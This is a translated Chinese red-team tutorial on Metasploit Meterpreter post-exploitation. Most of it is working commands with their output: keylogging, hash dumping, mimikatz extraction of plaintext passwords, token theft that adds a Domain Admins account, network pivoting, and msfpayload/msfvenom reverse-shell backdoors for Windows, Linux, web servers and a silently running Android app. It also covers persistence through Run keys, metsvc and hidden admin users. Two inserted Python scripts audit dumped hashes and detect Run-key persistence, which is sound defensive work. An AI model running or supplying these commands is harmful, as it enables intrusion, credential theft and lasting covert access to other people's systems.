红日攻防实验室 (Red Sun Attack and Defense Lab)

Meterpreter Security Notes (Part 1)

Meterpreter
1. What is Meterpreter?
It is just shellcode that resides in memory.
It is somewhat better than the usual attack techniques; an ordinary payload works like this:
2. Common Meterpreter commands
File system commands:
cat c:\boot.ini # view the contents of a file
getwd # print the current working directory
upload /root/Desktop/netcat.exe c:\ # upload a file to the target
download nimeia.txt /root/Desktop/ # download a file to the local machine
edit c:\boot.ini # edit a file
search -d c:\windows -f *.mdb # search for files

Network commands:
ipconfig / ifconfig # show network interface information
portfwd add -l 5555 -p 3389 -r 192.168.198.129 # port forwarding: listen on local port 5555 and relay it to port 3389 on the target
root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
route # show the routing table
System commands:
ps # list running processes
migrate pid # migrate the Meterpreter session into the process whose PID is pid
execute -H -i -f cmd.exe # spawn a new cmd.exe process; -H hidden, -i interactive
getpid # get the PID of the current process
kill pid # kill a process
getuid # show the current user and privileges
sysinfo # show target system information such as hostname and OS
shutdown # shut down the machine
Keyboard commands
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
dir <Return> cd <Ctrl> <LCtrl>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
Dumping hashes
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TESTING
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] Croxy:"Whoareyou"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
[+] test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::
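
The hashdump output above is in pwdump format (user:RID:LM:NT:::), and two well-known values in it matter to a defender: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, and an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, which is exactly what the Administrator line above shows. The Python audit below is an added example, not part of the original notes: it parses the three lines from this page plus one constructed svc_backup line (added only to show password-reuse detection) and reports blank passwords, stored LM hashes, and accounts that share an NT hash.

```python
import re
from collections import defaultdict

# The first three lines are the smart_hashdump output shown on this page; the
# fourth (svc_backup) is a constructed line added here to demonstrate reuse detection.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
"""

# LM/NT hashes of the empty string. An LM field equal to EMPTY_LM means no LM
# hash is stored (NoLMHash); an NT field equal to EMPTY_NT means a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)


def parse_hashdump(text):
    """Parse pwdump-format lines (user:rid:lm:nt:::); non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
            records.append(rec)
    return records


def audit_hashdump(text):
    """Return sorted (user, finding) pairs: blank passwords, stored LM hashes, reuse."""
    findings = []
    by_nt = defaultdict(list)
    for rec in parse_hashdump(text):
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "blank password"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored; NoLMHash not enforced"))
        by_nt[rec["nt"]].append(rec["user"])
    # Different accounts with the same NT hash share the same password.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for user in users:
                others = ", ".join(sorted(u for u in users if u != user))
                findings.append((user, "same password as " + others))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit_hashdump(SAMPLE_HASHDUMP):
        print(f"{user}: {finding}")
```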

Obtaining plaintext credentials
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials

kerberos credentials

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : Testing
BootKey : 8c2c8d96e92a8ccfc407a1ca48531239

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Croxy ; Testing ; hehe }
[1] { test ; Testing ; test }
Gaining access with a hash
use exploit/windows/smb/psexec
Intranet proxying
Windows
meterpreter > run autoroute -s 10.42.0.54
[*] Adding a route to 10.42.0.54/255.255.255.0...
[+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.

Auxiliary action:
Name Description
---- -----------
Proxy

msf auxiliary(socks4a) > route print

Active Routing Table

Subnet Netmask Gateway
------ ------- -------
10.42.0.54 255.255.255.0 Session 1

msf auxiliary(socks4a) > ifconfig
[*] exec: ifconfig

msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx
SRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx is the VPS on which you run msf)

msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
Then configure proxychains with a socks4 proxy pointing at port 1080 on the VPS, and the internal network becomes reachable.
SSH proxy
msf > load meta_ssh
msf > use multi/ssh/login_password
msf > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf > set USER test
USER => test
msf > set PASS reverse
PASS => reverse
msf > set PAYLOAD ssh/metassh_session
PAYLOAD => ssh/metassh_session
msf > exploit -z
[*] Connecting to dsl@192.168.56.3:22 with password reverse
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300
[*] Session 1 created in the background.
msf > route add 192.168.57.0 255.255.255.0 1
After that, scan the internal network at leisure.
Of course, it is still recommended to use this directly:
ssh -f -N -D 127.0.0.1:6666 test@103.224.81.1.1
Stealing tokens
meterpreter > ps # list the target's processes and find the PID of one running under a domain admin account
meterpreter > steal_token pid
Method 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available

IIS APPPOOL\zyk
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
QLWEB\Administrator

Impersonation Tokens Available

NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token QLWEB\Administrator
[+] Delegation token available
[+] Successfully impersonated user QLWEB\Administrator
meterpreter > getuid
Server username: QLWEB\Administrator
meterpreter > add_user 0xfa funny -h 192.168.3.98 # add an account on the domain controller
meterpreter > add_group_user "Domain Admins" 0xfa -h 192.168.3.98 # add the account to the Domain Admins group
Intranet scanning
meterpreter > run autoroute -s 192.168.3.98
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
PORTS => 80,8080,21,22,3389,445,1433,3306
msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24
RHOSTS => 192.168.3.1/24
msf auxiliary(tcp) > set THREADS 10
THREADS => 10
msf auxiliary(tcp) > exploit

Some commonly used exploitation modules
auxiliary/admin/realvnc_41_bypass (RealVNC 4 bypass; exploitation tools for it are also available online)
auxiliary/admin/cisco/cisco_secure_acs_bypass (Cisco bypass for version 5.1 or unpatched 5.2; a fairly old bug)
auxiliary/admin/http/jboss_deploymentfilerepository (a favorite when JBoss shows up on the internal network :))
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (D-Link command execution :)
auxiliary/admin/mssql/mssql_exec (run commands with a weak sa password obtained by brute force; no output is echoed :()
auxiliary/scanner/http/jboss_vulnscan (JBoss, a good friend during internal-network penetration)
auxiliary/admin/mysql/mysql_sql (run SQL statements with a brute-forced weak password :)
auxiliary/admin/oracle/post_exploitation/win32exec (Win32 command execution via a brute-forced weak Oracle password)
auxiliary/admin/postgres/postgres_sql (run SQL statements with a brute-forced postgres user)
Scanner modules
auxiliary/scanner/rsync/modules_list (Rsync)
auxiliary/scanner/misc/redis_server (Redis)
auxiliary/scanner/ssl/openssl_heartbleed (Heartbleed)
auxiliary/scanner/mongodb/mongodb_login (MongoDB)
auxiliary/scanner/elasticsearch/indices_enum (Elasticsearch)
auxiliary/scanner/http/axis_local_file_include (Axis local file include)
auxiliary/scanner/http/http_put (HTTP PUT)
auxiliary/scanner/http/gitlab_user_enum (enumerate internal GitLab users)
auxiliary/scanner/http/jenkins_enum (enumerate internal Jenkins users)
auxiliary/scanner/http/svn_scanner (SVN hunter :))
auxiliary/scanner/http/tomcat_mgr_login (Tomcat brute force)
auxiliary/scanner/http/zabbix_login (Zabbix :))
Let's rank the commands:
First place: ps + migrate. We got in through IE, so what if IE gets closed? If the victim never visits the hooked page again, we would never get a shell again.
So migrate early into another process space, such as Explorer.exe, which is unlikely to be closed.
Second place: execute, which gets you cmd.exe.
Third place: portfwd, port forwarding; in practice you almost always need to forward something.
3. Meterpreter and post-exploitation modules
Auxiliary (AUX) modules: information gathering
Exploit modules: exploitation
Post modules: host control and extended attacks, supporting the whole penetration-testing process
Meterpreter is a Metasploit payload, just a much more powerful one. Its relationship to the post modules is that the former is the delivery channel for the latter.

Next we introduce the payloads that can generate backdoors.
msfpayload / msfvenom
1.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}
2.msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
3.root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
4.msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
5.msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
6.msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
7.msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
8.msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
Besides the 8 payloads generated above, we can also generate mobile payloads. Mobile payloads are mainly for Android; iOS has not been tried yet.
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333 -o ~/Desktop/1234.apk
After generation, tapping the app on the phone shows nothing; the app silently runs in the background and can do anything :)
Once the payload is running on the phone, we need to start a listener in msf; the corresponding handler is as follows.

msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 23333
LPORT => 23333
msf exploit(handler) > set LHOST 10.42.0.1
LHOST => 10.42.0.1
msf exploit(handler) > exploit

Hands-on section

First we generate a payload file.exe and run that exe on the target Windows machine; the handler then returns a meterpreter session.
Then set up the listener
kali-Sec-redClub:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...
Then run file.exe on Windows 2003
A meterpreter session comes back
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800
meterpreter >

The program ran and the session came back successfully.

(1). Migrating meterpreter to another process

During an engagement the current meterpreter process is easily killed for all sorts of reasons, so migrating meterpreter into a long-running system process is a good idea.
meterpreter > getuid // show the current privileges
Server username: WIN-K30V5SI0PCE\Administrator
meterpreter > ps // list the current processes

============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
244 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
264 492 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
336 328 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
388 380 csrss.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
396 328 wininit.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
432 380 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
492 396 services.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
meterpreter > migrate 2044 // migrate into the explorer process with PID 2044
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

Verify
meterpreter > ps

============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86_64 0
244 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
264 492 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
336 328 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
As shown above, the file.exe process is gone. Note that if antivirus is present, it may block the process injection.
(2). Checking whether the target is a virtual machine
meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
My 2003 box is installed on VMware

**(3). Installing a backdoor**

Method one: the persistence script
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:

-A        Automatically start a matching multi/handler to connect to the agent
-L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on the remote host where Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >
Run it
meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
meterpreter >
Now exit the server
Reconfigure the listener
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >
As shown, the connect-back succeeded; this passive backdoor is a good choice in some special situations.
Method two
Metsvc
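The persistence script above leaves two artifacts a defender can look for: a .vbs agent dropped under %TEMP% and a randomly named value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. The Python script below is an added example, not part of the original notes: it parses constructed `reg query` output for that Run key and flags any value that launches a script or points into a Temp directory; that the Run value's data is the .vbs path itself is an assumption about the persistence script, and the other entries are made up.

```python
import re

# Constructed `reg query HKLM\...\Run` output. The HstWtPyXHYnhQ entry mirrors the
# autorun artifact shown on this page; that its value data is the Temp .vbs path is
# an assumption about the persistence script. The other entries are made up.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    HstWtPyXHYnhQ    REG_SZ    C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
    Updater    REG_SZ    wscript.exe //B C:\Users\zero\AppData\Roaming\upd.js
"""

# One "<name>    <REG_type>    <data>" line of reg query output.
ENTRY_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
# A file path inside the value data: drive letter, %VAR% or UNC prefix, optional quotes.
TARGET_RE = re.compile(
    r'"?(?P<path>(?:[A-Za-z]:|%\w+%|\\\\)[^"]*?\.(?P<ext>[A-Za-z0-9]{2,4}))"?(?=\s|$)'
)
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "hta", "bat", "cmd", "ps1"}


def parse_run_entries(text):
    """Parse reg query output into a list of {name, type, data} dicts."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.rstrip())
        if m:
            entries.append(m.groupdict())
    return entries


def audit_run_keys(text):
    """Map each suspicious value name to a sorted list of reasons it was flagged."""
    flagged = {}
    for entry in parse_run_entries(text):
        reasons = set()
        for m in TARGET_RE.finditer(entry["data"]):
            parts = m.group("path").lower().split("\\")
            ext = m.group("ext").lower()
            if ext in SCRIPT_EXTS:
                reasons.add(f"runs a {ext} script")
            # Any directory component named Temp (not the file itself) is a red flag:
            # the persistence script on this page drops its agent under %TEMP%.
            if "temp" in parts[:-1]:
                reasons.add("located in a Temp directory")
        if reasons:
            flagged[entry["name"]] = sorted(reasons)
    return flagged


if __name__ == "__main__":
    for name, reasons in audit_run_keys(SAMPLE_REG_QUERY).items():
        print(f"{name}: {'; '.join(reasons)}")
```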
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...

 * Installing service metsvc
 * Starting service
   Service metsvc successfully installed.

meterpreter >
The metsvc backdoor installed successfully; next, connect to it
Kali-Sec-redClub:~# msfconsole

   =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
+ -- --=[ 1239 exploits - 755 auxiliary - 207 post
+ -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/metsvc_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LPORT 4444 yes The listen port
RHOST no The target address

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >
Method three:
This one is similar to adding an account for remote desktop (3389) access
meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: zero with Password: haizeiwang123_
[*] Hiding user from Windows Login screen
[*] Adding User: zero to local group 'Remote Desktop Users'
[*] Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >

**(4). Port forwarding**

It is common for the host to sit on an internal network; Metasploit ships with a port-forwarding tool

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

-L <opt>  The local host to listen on (optional).
-h        Help banner.
-l <opt>  The local port to listen on.
-p <opt>  The remote port to connect to.
-r <opt>  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >
Then run
rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234
**(5). Obtaining passwords**

The French tool mimikatz can obtain the operating system's plaintext passwords directly, and meterpreter includes it as a module
First load the mimikatz module
Since my Windows 2008 is 64-bit, first migrate into a 64-bit process
meterpreter > ps

......
2000 472 dllhost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Windows\explorer.exe
2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCE\Administrator C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe
2780 2256 winlogon.exe x86_64 2 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Windows\System32\dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >
Get password hashes
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials

===============

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO)
0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;47971 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)
Get plaintext passwords
meterpreter > kerberos

====================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$
0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$
0;47971 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;995 Negotiate NT AUTHORITY IUSR
0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_
0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
It is a very good tool, mainly for going after domain controllers.
http://drops.wooyun.org/tips/7547 mimikatz
Finally, we will set up a domain-controller environment for a hands-on exercise.

Tags: intranet security

Author: redBu11


